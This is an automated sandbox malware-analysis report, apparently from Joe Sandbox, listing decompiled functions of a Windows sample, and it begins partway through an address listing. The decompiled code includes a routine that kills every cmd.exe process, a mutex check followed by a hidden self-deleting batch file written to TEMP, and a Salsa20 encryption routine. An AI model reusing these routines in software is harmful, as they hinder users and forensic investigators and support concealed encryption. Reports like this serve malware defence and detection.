0x004103c9
0x004103e5
0x004103ec
0x004103f2
0x004103f7
0x004103fc
0x004103fc
0x00410401
0x00410408
0x0041040f
0x00410417
0x00410433
0x00410436
0x00410419
0x0041041c
0x0041041d
0x00410427
0x0041042c
0x0041042c
0x0041041d
0x0041043f
0x00410445
0x0041044a
0x00410451
0x00410458
0x00410458
0x0041045f
0x00410467
0x0041046c
0x0041046c
0x0041046f
0x00410471
0x00410481
0x00410489
0x00410490
0x00410496
0x0041049c
0x0041049e
0x0041049e
0x004104a1
0x004104a1
0x004104a4
0x004104a7
0x004104ae
0x004104b0
0x004104b0
0x004104b5
0x004104d2
0x004104d9
0x004104df
0x004104e4
0x004104e9
0x004104e9
0x004104ee
0x004104f5
0x004104fc
0x00410504
0x00410520
0x00410523
0x00410506
0x00410509
0x0041050a
0x00410514
0x00410519
0x00410519
0x0041050a
0x0041052c
0x00410532
0x00410537
0x0041053e
0x00410545
0x00410545
0x0041054c
0x00410558
0x0041055d
0x0041055d
0x00000000
0x0041054c
0x00410498
0x00000000
0x00410498
0x00410568
0x00410728
0x0041072c
0x00410731
0x00410736
0x00410736
0x0041073b
0x00410743
0x0041074a
0x00410751
0x00410755
0x0041075a
0x0041075f
0x0041075f
0x00410770
0x00410775
0x0041077c
0x0041077e
0x0041077e
0x00410792
0x00410794
0x0041079c
0x004107a1
0x004107a1
0x004107a6
0x004107ad
0x004107af
0x004107b6
0x004107c0
0x004109c7
0x004109cb
0x004109d0
0x004109d5
0x004109d5
0x004109d8
0x004109da
0x004109e1
0x004109e8
0x00000000
0x004107c6
0x004107c6
0x004107d0
0x004107d0
0x004107d5
0x004107e0
0x004107e0
0x004107e6
0x00000000
0x00000000
0x004107eb
0x00410802
0x00410802
0x0041080b
0x0041080d
0x00000000
0x00000000
0x00410813
0x00410818
0x00410820
0x00410820
0x00410826
0x00000000
0x00000000
0x0041082b
0x00410842
0x00410842
0x0041084b
0x0041084d
0x00000000
0x00000000
0x0041085a
0x004108bf
0x004108c6
0x004108c8
0x004108ca
0x004108ca
0x004108d1
0x004108d8
0x004108db
0x004108e5
0x004108ed
0x004108f2
0x004108fe
0x00410904
0x0041090a
0x0041090a
0x00410910
0x00410910
0x00410913
0x00410916
0x0041091d
0x00000000
0x00410900
0x00410900
0x0041091f
0x0041091f
0x0041092a
0x00410936
0x0041093b
0x00410944
0x0041094e
0x00410950
0x00410950
0x00410952
0x00410953
0x00410954
0x00410959
0x0041095e
0x00410963
0x0041096d
0x0041096f
0x0041096f
0x00410978
0x00410979
0x0041097d
0x0041097e
0x00410983
0x00410988
0x00410990
0x00410990
0x00410988
0x00410995
0x00410995
0x0041099d
0x004109a2
0x004109a7
0x004109a7
0x00000000
0x0041099d
0x004108fe
0x00410869
0x00410871
0x0041087b
0x0041087f
0x00410884
0x00410885
0x0041088a
0x0041088c
0x0041088e
0x00410895
0x0041089d
0x004108a4
0x004108b2
0x004108b7
0x00000000
0x004108b7
0x0041082d
0x00410831
0x00410835
0x00000000
0x00000000
0x00410837
0x0041083a
0x00410840
0x00000000
0x00000000
0x00000000
0x00410840
0x00410846
0x00410848
0x00000000
0x00410848
0x004107ed
0x004107f1
0x004107f5
0x00000000
0x00000000
0x004107f7
0x004107fa
0x00410800
0x00000000
0x00000000
0x00000000
0x00410800
0x00410806
0x00410808
0x00000000
0x004109aa
0x004109b8
0x004109c1
0x00000000
0x004109c1
0x004107c0
0x0041056e
0x00410573
0x00410575
0x00410577
0x0041057e
0x00410586
0x0041058d
0x00410592
0x00410597
0x0041059c
0x00000000
0x00000000
0x004105a2
0x004105ad
0x004105ba
0x004105bf
0x004105c3
0x004105c5
0x004105c8
0x004105cd
0x004105eb
0x004105eb
0x004105f0
0x004105f5
0x004105ff
0x00410601
0x00410601
0x00410605
0x0041060b
0x00410610
0x00410620
0x00410628
0x0041062f
0x00410638
0x0041063d
0x00410642
0x00410642
0x00410645
0x0041064a
0x00410651
0x00410658
0x0041065f
0x00410688
0x00410661
0x00410664
0x00410665
0x00410675
0x0041067a
0x0041067d
0x0041067d
0x00410665
0x00410691
0x00410697
0x0041069c
0x004106a7
0x004106ae
0x004106b3
0x004106b9
0x004106c0
0x004106c2
0x004106c4
0x004106c4
0x004106c8
0x004106d5
0x004106db
0x004106dd
0x004106dd
0x004106e1
0x004106e7
0x004106ec
0x004106ee
0x004106f0
0x004106f7
0x004106ff
0x00410706
0x0041070d
0x00410713
0x00410718
0x00410718
0x0041071d
0x00410720
0x00410725
0x00410725
0x00000000
0x0041071d
0x004105d0
0x004105d7
0x004105df
0x004105e3
0x004105e4
0x004105e7
0x00000000
0x004105d0
0x00410363
0x00000000
0x004101bc
0x004101bc
0x004101c0
0x004101c2
0x004101c9
0x004101cc
0x004101d6
0x004101de
0x004101eb
0x004101ef
0x004101f6
0x004101fe
0x00410205
0x0041020c
0x00410211
0x00410215
0x0041021b
0x004102a3
0x004102a7
0x004102ac
0x004102b1
0x004102b1
0x004102b6
0x004102bd
0x004102c4
0x004102cb
0x004102cf
0x004102d4
0x004102d9
0x004102d9
0x00000000
0x004102cf
0x00410221
0x00410227
0x00000000
0x00410229
0x00410230
0x0041023a
0x0041023c
0x00410246
0x0041024b
0x0041024b
0x00410254
0x0041025a
0x00410263
0x00410265
0x0041026f
0x00410277
0x00410277
0x00410283
0x0041028b
0x00410290
0x00410295
0x0041029a
0x0041036b
0x00410370
0x00410375
0x00410375
0x00410378
0x0041037a
0x00410385
0x0041038c
0x00410390
0x00410399
0x0041039e
0x0041039e
0x004109ec
0x004109f0
0x004109f5
0x004109fa
0x00410a02
0x00410a0d
0x004102a0
0x004102a0
0x00000000
0x004102a0
0x0041029a
0x004102dc
0x004102dc
0x004102dd
0x004102e0
0x00000000
0x004101c0

APIs

Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411ACA
Part of subcall function 00411AB0: DispatchMessageW.USER32 ref: 00411AE0
Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411AEE

PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00410346
_memmove.LIBCMT ref: 00410427
PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0041048E
_memmove.LIBCMT ref: 00410514

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Message$FileFindNamePathPeek_memmove$Dispatch
String ID:
API String ID: 273148273-0
Opcode ID: 0f4dfb234ab613a54dac9ab36d8dbd89e4ce7c6147fd1fb4171dcbb8ca1f52b7
Instruction ID: 4d52a43d2e6eeb98f1fe08e229a92f838bd03635929547cf71b8ba18611ce854
Opcode Fuzzy Hash: 0f4dfb234ab613a54dac9ab36d8dbd89e4ce7c6147fd1fb4171dcbb8ca1f52b7
Instruction Fuzzy Hash: EF429F70D00208DBDF14DFA4C985BDEB7F5BF04308F20456EE415A7291E7B9AA85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00412440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52
processCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00412440() {
				char _v524;
				long _v552;
				void* _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct tagPROCESSENTRY32W* _t7;
				int _t10;
				void* _t16;
				void* _t17;
				void* _t18;
				void* _t20;

				_t17 = CreateToolhelp32Snapshot(0xf, 0);
				_v560 = 0x22c;
				_t7 =  &_v560;
				Process32FirstW(_t17, _t7);
				_t16 = CloseHandle;
				if(_t7 == 0) {
					L7:
					return CloseHandle(_t17);
				}
				_push(_t18);
				do {
					_t10 = E00420235(_t16, _t17, _t18,  &_v524, L"cmd.exe");
					_t20 = _t20 + 8;
					if(_t10 == 0) {
						_t18 = OpenProcess(1, _t10, _v552);
						if(_t18 != 0) {
							TerminateProcess(_t18, 9);
							CloseHandle(_t18);
						}
					}
				} while (Process32NextW(_t17,  &_v560) != 0);
				goto L7;
			}

0x00412455
0x00412457
0x00412461
0x00412469
0x0041246f
0x00412477
0x004124cc
0x004124d4
0x004124d4
0x00412479
0x00412480
0x0041248c
0x00412491
0x00412496
0x004124a7
0x004124ab
0x004124b0
0x004124b7
0x004124b7
0x004124ab
0x004124c7
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
CloseHandle.KERNEL32(00000000), ref: 004124B7
Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
CloseHandle.KERNEL32(00000000), ref: 004124CD

Strings

cmd.exe, xrefs: 00412486

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID: cmd.exe
API String ID: 2696918072-723907552
Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9

Uniqueness

Uniqueness Score: -1.00%

Function 004382A2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004382A2(short _a4, intOrPtr _a8) {
				short _t13;
				short _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E00437413(_t28, ?str?) != 0) {
					if(E00437413(_t28, ?str?) != 0) {
						return E00423C92(_t28);
					}
					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t13 = _a4;
				if(_t13 == 0) {
					return GetACP();
				}
				return _t13;
			}

0x004382a6
0x004382ab
0x004382d3
0x00000000
0x004382fc
0x004382ee
0x0043831a
0x00000000
0x0043831a
0x00000000
0x004382f0
0x00438318
0x00000000
0x00000000
0x0043831e
0x00438323
0x00438327
0x00438327
0x004382f5

APIs

_wcscmp.LIBCMT ref: 004382B9
_wcscmp.LIBCMT ref: 004382CA
GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310

Strings

ACP, xrefs: 004382B3
OCP, xrefs: 004382C4

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: InfoLocale_wcscmp
String ID: ACP$OCP
API String ID: 1351282208-711371036
Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C

Uniqueness

Uniqueness Score: -1.00%

Function 0040C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280
COMMONCrypto

Download Yara Rule

C-Code - Quality: 55%

			E0040C070(intOrPtr __ecx, void* __edx, void* __esi, signed int* _a4, signed char* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				intOrPtr _v128;
				char _v190;
				void* __ebx;
				void* __edi;
				intOrPtr _t174;
				signed int _t186;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t229;
				signed int _t235;
				signed int _t237;
				void* _t244;
				intOrPtr _t248;
				signed char _t250;
				signed int _t252;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t258;
				signed int _t260;
				signed int _t262;
				signed int _t264;
				signed int _t266;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int* _t272;
				signed int _t276;
				signed int _t277;
				intOrPtr _t284;
				void* _t285;
				void* _t286;
				signed int _t288;
				signed int _t289;
				unsigned int _t290;
				intOrPtr _t292;
				signed char* _t293;
				signed int _t294;
				signed int _t295;
				signed char* _t296;
				void* _t297;
				signed int _t298;
				signed int _t299;
				char* _t301;
				void* _t303;
				void* _t305;
				void* _t313;

				_t297 = __esi;
				_t286 = __edx;
				_t251 = _a4;
				_t174 = __ecx;
				_v56 = __ecx;
				_t293 = _a8;
				if(_a4 == 0) {
					L2:
					_push(0x7a);
					E004211DD(_t251, _t286, _t293, _t297, _t309, L"input != nullptr && output != nullptr", L"e:\\doc\\my work (c++)\\_git\\encryption\\encryptionwinapi\\Salsa20.inl");
					_t174 = _v56;
				} else {
					_t309 = _t293;
					if(_t293 == 0) {
						goto L2;
					}
				}
				if(_a12 != 0) {
					_v128 = _t174 -  &_v190;
					_push(_t297);
					do {
						asm("movdqu xmm0, [eax]");
						_v60 = 0xa;
						asm("movdqu [ebp-0x78], xmm0");
						asm("movdqu xmm0, [eax+0x10]");
						asm("movdqu [ebp-0x68], xmm0");
						asm("movdqu xmm0, [eax+0x20]");
						asm("movdqu [ebp-0x58], xmm0");
						_t294 = _v80;
						asm("movdqu xmm0, [eax+0x30]");
						_v8 = _v84;
						_v36 = _v88;
						_v16 = _v92;
						_v48 = _v96;
						_v44 = _v100;
						_v32 = _v104;
						_v12 = _v108;
						_v40 = _v112;
						asm("movdqu [ebp-0x48], xmm0");
						_t252 = _v76;
						_t276 = _v64;
						_t288 = _v68;
						_t298 = _v72;
						_v28 = _v116;
						_v24 = _v120;
						_t186 = _v124;
						_v52 = _t252;
						_v20 = _t186;
						do {
							asm("rol eax, 0x7");
							_v12 = _v12 ^ _t186 + _t252;
							asm("rol eax, 0x9");
							_v16 = _v16 ^ _v12 + _v20;
							asm("rol eax, 0xd");
							_t254 = _v52 ^ _v16 + _v12;
							_v52 = _t254;
							asm("ror eax, 0xe");
							_v20 = _v20 ^ _v16 + _t254;
							asm("rol eax, 0x7");
							_v36 = _v36 ^ _v24 + _v32;
							asm("rol eax, 0x9");
							_t299 = _t298 ^ _v36 + _v32;
							_t255 = _v44;
							asm("rol eax, 0xd");
							_v24 = _v24 ^ _v36 + _t299;
							asm("ror eax, 0xe");
							_v32 = _v32 ^ _v24 + _t299;
							asm("rol eax, 0x7");
							_t289 = _t288 ^ _v8 + _t255;
							asm("rol eax, 0x9");
							_v28 = _v28 ^ _v8 + _t289;
							asm("rol eax, 0xd");
							_t256 = _t255 ^ _v28 + _t289;
							_v44 = _t256;
							asm("ror eax, 0xe");
							_v8 = _v8 ^ _v28 + _t256;
							asm("rol eax, 0x7");
							_t258 = _v40 ^ _t294 + _t276;
							_v40 = _t258;
							asm("rol eax, 0x9");
							_t260 = _v48 ^ _t258 + _t276;
							_v48 = _t260;
							asm("rol eax, 0xd");
							_t295 = _t294 ^ _v40 + _t260;
							asm("ror eax, 0xe");
							_t277 = _t276 ^ _t260 + _t295;
							asm("rol eax, 0x7");
							_v24 = _v24 ^ _v20 + _v40;
							_t217 = _v24;
							_v120 = _t217;
							asm("rol eax, 0x9");
							_v28 = _v28 ^ _t217 + _v20;
							_t219 = _v28;
							_v116 = _t219;
							asm("rol eax, 0xd");
							_t262 = _v40 ^ _t219 + _v24;
							_v40 = _t262;
							asm("ror eax, 0xe");
							_v112 = _t262;
							_t264 = _v20 ^ _v28 + _t262;
							asm("rol eax, 0x7");
							_v44 = _v44 ^ _v32 + _v12;
							_t225 = _v44;
							_v100 = _t225;
							asm("rol eax, 0x9");
							_v20 = _t264;
							_v124 = _t264;
							_t266 = _v48 ^ _t225 + _v32;
							_v48 = _t266;
							asm("rol eax, 0xd");
							_v12 = _v12 ^ _v44 + _t266;
							_t229 = _v12;
							_v108 = _t229;
							asm("ror eax, 0xe");
							_v96 = _t266;
							_t268 = _v32 ^ _t229 + _t266;
							_v32 = _t268;
							_v104 = _t268;
							_t269 = _v36;
							asm("rol eax, 0x7");
							_t294 = _t295 ^ _v8 + _t269;
							asm("rol eax, 0x9");
							_v16 = _v16 ^ _v8 + _t294;
							_t235 = _v16;
							_v92 = _t235;
							asm("rol eax, 0xd");
							_t270 = _t269 ^ _t235 + _t294;
							_t237 = _t270;
							_v36 = _t270;
							_v88 = _t237;
							asm("ror eax, 0xe");
							_v8 = _v8 ^ _t237 + _v16;
							_v84 = _v8;
							asm("rol eax, 0x7");
							_t252 = _v52 ^ _t277 + _t289;
							_v52 = _t252;
							_v76 = _t252;
							asm("rol eax, 0x9");
							_t298 = _t299 ^ _t277 + _t252;
							asm("rol eax, 0xd");
							_t288 = _t289 ^ _t298 + _t252;
							asm("ror eax, 0xe");
							_t276 = _t277 ^ _t288 + _t298;
							_t138 =  &_v60;
							 *_t138 = _v60 - 1;
							_t186 = _v20;
						} while ( *_t138 != 0);
						_t272 = _a4;
						_t244 = 0;
						_v80 = _t294;
						_t296 = _a8;
						_v64 = _t276;
						_v68 = _t288;
						_v72 = _t298;
						do {
							_t301 =  &_v190 + _t244;
							 *(_t305 + _t244 - 0x78) =  *(_t305 + _t244 - 0x78) +  *((intOrPtr*)(_t301 + _v128));
							_t290 =  *(_t305 + _t244 - 0x78);
							 *((char*)(_t301 - 1)) = _t290 >> 8;
							 *(_t305 + _t244 - 0xbc) = _t290;
							_t244 = _t244 + 4;
							 *_t301 = _t290 >> 0x10;
							 *((char*)(_t301 + 1)) = _t290 >> 0x18;
							_t313 = _t244 - 0x40;
						} while (_t313 < 0);
						_t284 = _v56;
						_t292 = _a12;
						 *((intOrPtr*)(_t284 + 0x20)) =  *((intOrPtr*)(_t284 + 0x20)) + 1;
						 *((intOrPtr*)(_t284 + 0x24)) =  *((intOrPtr*)(_t284 + 0x24)) + (0 | _t313 == 0x00000000);
						_t303 =  >=  ? 0x40 : _t292;
						_t285 = 0;
						if(_t303 == 0) {
							goto L12;
						} else {
							goto L10;
						}
						do {
							L10:
							_t292 = _t292 - 1;
							_t250 =  *(_t305 + _t285 - 0xbc) ^  *_t272;
							_t285 = _t285 + 1;
							 *_t296 = _t250;
							_t272 =  &(_t272[0]);
							_t296 =  &(_t296[1]);
						} while (_t285 < _t303);
						_a12 = _t292;
						_a4 = _t272;
						_a8 = _t296;
						L12:
						_t248 = _v56;
					} while (_t292 != 0);
					return _t248;
				}
				return _t174;
			}

0x0040c070
0x0040c070
0x0040c07a
0x0040c07d
0x0040c07f
0x0040c083
0x0040c088
0x0040c08e
0x0040c08e
0x0040c09a
0x0040c09f
0x0040c08a
0x0040c08a
0x0040c08c
0x00000000
0x00000000
0x0040c08c
0x0040c0a9
0x0040c0b9
0x0040c0bc
0x0040c0c0
0x0040c0c0
0x0040c0c4
0x0040c0cb
0x0040c0d0
0x0040c0d5
0x0040c0da
0x0040c0df
0x0040c0e4
0x0040c0e7
0x0040c0ef
0x0040c0f5
0x0040c0fb
0x0040c101
0x0040c107
0x0040c10d
0x0040c113
0x0040c119
0x0040c11f
0x0040c124
0x0040c127
0x0040c12a
0x0040c12d
0x0040c130
0x0040c136
0x0040c139
0x0040c13c
0x0040c13f
0x0040c142
0x0040c147
0x0040c14a
0x0040c153
0x0040c156
0x0040c15f
0x0040c162
0x0040c169
0x0040c16c
0x0040c16f
0x0040c178
0x0040c17b
0x0040c184
0x0040c187
0x0040c189
0x0040c191
0x0040c194
0x0040c19c
0x0040c19f
0x0040c1a7
0x0040c1aa
0x0040c1b1
0x0040c1b4
0x0040c1bc
0x0040c1bf
0x0040c1c6
0x0040c1cc
0x0040c1cf
0x0040c1d5
0x0040c1d8
0x0040c1da
0x0040c1e3
0x0040c1e6
0x0040c1ed
0x0040c1f0
0x0040c1f3
0x0040c1f8
0x0040c1fb
0x0040c203
0x0040c206
0x0040c209
0x0040c20c
0x0040c212
0x0040c215
0x0040c218
0x0040c21b
0x0040c221
0x0040c227
0x0040c22e
0x0040c231
0x0040c234
0x0040c23a
0x0040c242
0x0040c245
0x0040c248
0x0040c24b
0x0040c251
0x0040c254
0x0040c257
0x0040c25d
0x0040c264
0x0040c267
0x0040c26a
0x0040c26d
0x0040c270
0x0040c275
0x0040c278
0x0040c27e
0x0040c283
0x0040c286
0x0040c289
0x0040c28e
0x0040c291
0x0040c298
0x0040c29b
0x0040c29e
0x0040c2a1
0x0040c2a6
0x0040c2a9
0x0040c2ab
0x0040c2ad
0x0040c2b3
0x0040c2b9
0x0040c2bc
0x0040c2c2
0x0040c2c8
0x0040c2cb
0x0040c2cd
0x0040c2d0
0x0040c2d6
0x0040c2d9
0x0040c2de
0x0040c2e1
0x0040c2e6
0x0040c2e9
0x0040c2eb
0x0040c2eb
0x0040c2ee
0x0040c2ee
0x0040c2f7
0x0040c2fa
0x0040c2fc
0x0040c2ff
0x0040c302
0x0040c305
0x0040c308
0x0040c310
0x0040c319
0x0040c31e
0x0040c322
0x0040c32b
0x0040c330
0x0040c337
0x0040c340
0x0040c342
0x0040c345
0x0040c345
0x0040c34a
0x0040c352
0x0040c357
0x0040c35d
0x0040c368
0x0040c36b
0x0040c36f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c371
0x0040c371
0x0040c378
0x0040c379
0x0040c37b
0x0040c37c
0x0040c37e
0x0040c37f
0x0040c380
0x0040c384
0x0040c387
0x0040c38a
0x0040c38d
0x0040c38d
0x0040c390
0x00000000
0x0040c398
0x0040c39e

APIs

__wassert.LIBCMT ref: 0040C09A

Strings

e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
input != nullptr && output != nullptr, xrefs: 0040C095

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: __wassert
String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
API String ID: 3993402318-1975116136
Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54

Uniqueness

Uniqueness Score: -1.00%

Function 004124E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004124E0() {
				long _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v100;
				char _v364;
				char _v628;
				void _v1668;
				char _v1932;
				char _v2956;
				long _t40;
				signed int _t48;
				void* _t78;
				intOrPtr _t79;
				int _t104;
				long _t106;
				int _t108;
				void* _t110;
				intOrPtr* _t113;
				void* _t115;

				if( *0x513234 == 0) {
					 *0x513230 = CreateMutexA(0, 0, "{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}");
					_t40 = GetLastError();
					_push( *0x513230);
					if(_t40 != 0xb7) {
						CloseHandle();
						 *0x513230 = 0;
						goto L7;
					} else {
						_t104 = CloseHandle();
						 *0x513230 = 0;
						return _t104;
					}
				} else {
					 *0x513238 = CreateMutexA(0, 0, "{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}");
					_t106 = GetLastError();
					_push( *0x513238);
					if(_t106 != 0xb7) {
						CloseHandle();
						 *0x513238 = 0;
						L7:
						if(E00412360() == 0) {
							GetModuleFileNameA(0,  &_v628, 0x104);
							GetShortPathNameA( &_v628,  &_v628, 0x104);
							_t48 = GetEnvironmentVariableA("TEMP",  &_v1932, 0x104);
							asm("sbb eax, eax");
							lstrcpyA( &_v364, _t48 &  &_v1932);
							lstrcatA( &_v364, "\\");
							lstrcatA( &_v364, "delself.bat");
							lstrcpyA( &_v1668, "@echo off\r\n:try\r\ndel \"");
							lstrcatA( &_v1668,  &_v628);
							lstrcatA( &_v1668, "\"\r\nif exist \"");
							lstrcatA( &_v1668,  &_v628);
							lstrcatA( &_v1668, "\" goto try\r\n");
							lstrcatA( &_v1668, "del \"");
							lstrcatA( &_v1668,  &_v364);
							lstrcatA( &_v1668, "\"");
							if(PathFileExistsA( &_v364) != 0) {
								DeleteFileA( &_v364);
							}
							_t78 = CreateFileA( &_v364, 0xc0000000, 3, 0, 2, 0x80, 0);
							_t113 =  &_v1668;
							_t110 = _t78;
							_t115 = _t113 + 1;
							do {
								_t79 =  *_t113;
								_t113 = _t113 + 1;
							} while (_t79 != 0);
							WriteFile(_t110,  &_v1668, _t113 - _t115,  &_v8, 0);
							FlushFileBuffers(_t110);
							CloseHandle(_t110);
							E0042B420( &_v100, 0, 0x44);
							_v100.cb = 0x44;
							_v100.dwFlags = 1;
							_v100.wShowWindow = 0;
							SetLastError(0);
							lstrcpyA( &_v2956, "\"");
							lstrcatA( &_v2956,  &_v364);
							lstrcatA( &_v2956, "\"");
							CreateProcessA(0,  &_v2956, 0, 0, 0, 0, 0, 0,  &_v100,  &_v24);
							CloseHandle(_v24.hThread);
							return CloseHandle(_v24);
						} else {
							return E00412440();
						}
					} else {
						_t108 = CloseHandle();
						 *0x513238 = 0;
						return _t108;
					}
				}
			}

0x004124f3
0x00412556
0x0041255b
0x00412561
0x0041256c
0x0041258b
0x0041258d
0x00000000
0x0041256e
0x0041256e
0x00412574
0x00412584
0x00412584
0x004124f5
0x00412504
0x00412509
0x0041250f
0x0041251a
0x00412539
0x0041253b
0x00412597
0x0041259e
0x004125ba
0x004125cd
0x004125e4
0x004125fa
0x00412606
0x0041261a
0x00412628
0x00412636
0x00412646
0x00412654
0x00412664
0x00412672
0x00412680
0x00412690
0x0041269e
0x004126af
0x004126b8
0x004126b8
0x004126d7
0x004126dd
0x004126e3
0x004126e5
0x004126e8
0x004126e8
0x004126ea
0x004126eb
0x00412700
0x00412707
0x0041270e
0x00412718
0x00412720
0x00412729
0x00412730
0x00412735
0x00412747
0x0041275b
0x00412769
0x00412788
0x00412791
0x0041279e
0x004125a0
0x004125ab
0x004125ab
0x0041251c
0x0041251c
0x00412522
0x00412532
0x00412532
0x0041251a

APIs

CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
GetLastError.KERNEL32 ref: 00412509
CloseHandle.KERNEL32 ref: 0041251C
CloseHandle.KERNEL32 ref: 00412539
CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
GetLastError.KERNEL32 ref: 0041255B
CloseHandle.KERNEL32 ref: 0041256E

Strings

@echo off:trydel ", xrefs: 0041262A
delself.bat, xrefs: 0041261C
TEMP, xrefs: 004125DF
{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}, xrefs: 00412547
del ", xrefs: 00412674
D, xrefs: 00412720
" goto try, xrefs: 00412666
{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}, xrefs: 004124F5
"if exist ", xrefs: 00412648

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastMutex
